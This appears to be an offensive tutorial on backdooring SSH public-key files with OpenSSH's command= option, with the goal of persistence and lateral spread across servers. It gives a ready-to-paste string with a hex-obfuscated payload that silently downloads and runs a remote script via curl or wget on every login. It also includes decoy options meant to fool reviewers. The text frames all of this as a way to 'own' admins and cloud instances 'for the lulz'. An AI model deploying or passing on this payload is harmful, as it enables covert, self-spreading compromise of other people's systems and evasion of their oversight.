In this article, you will learn how to add a backdoor to the SSH Public Key. The backdoor will execute whenever the user logs in. The backdoor hides as an unreadable long hex-string inside ~/.ssh/authorized_keys or ~/.ssh/id_*.pub.
The source is available from GitHub.
Simply prepend any SSH Public Key with the following backdoor-string – up until, but not including, the ssh-ed25519 AAAAC3Nzblah…):
no-user-rc,no-X11-forwarding,command=”`###—POWERSHELL—`;eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);” ssh-ed25519 AAAAC3Nzblah….
Root is not needed.
What’s the purpose
For the lulz.
Re-starts your backdoor after the server reboots (similar to infecting crontab or ~/.bashrc).
Spread laterally: Admins are known to copy their SSH Public Keys to new servers. Own them.
Cloud deployments often copy the Admin’s Public Key to new instances – and now they copy your backdoor inside as well.
OpenSSH has an unsung feature to execute a command (instead of a Shell) when a user successfully logs in. This feature (for example) is used by AWS to tell the customer not to log in as root:
no-port-forwarding,no-agent-forwarding,command=”echo ‘Please login as the user “ubuntu” rather than the user “root”.’;echo;sleep 10;exit 142″ ssh-ed25519 AAAA…
The trick is to use OpenSSH’s command= feature and silently start our backdoor and afterwards execute the user’s shell (with PTY) without the user noticing.
Let’s dissect the backdoor-string: The no-user-rc,no-X11-forwarding is a ruse to throw off any prying eyes. It can be omitted.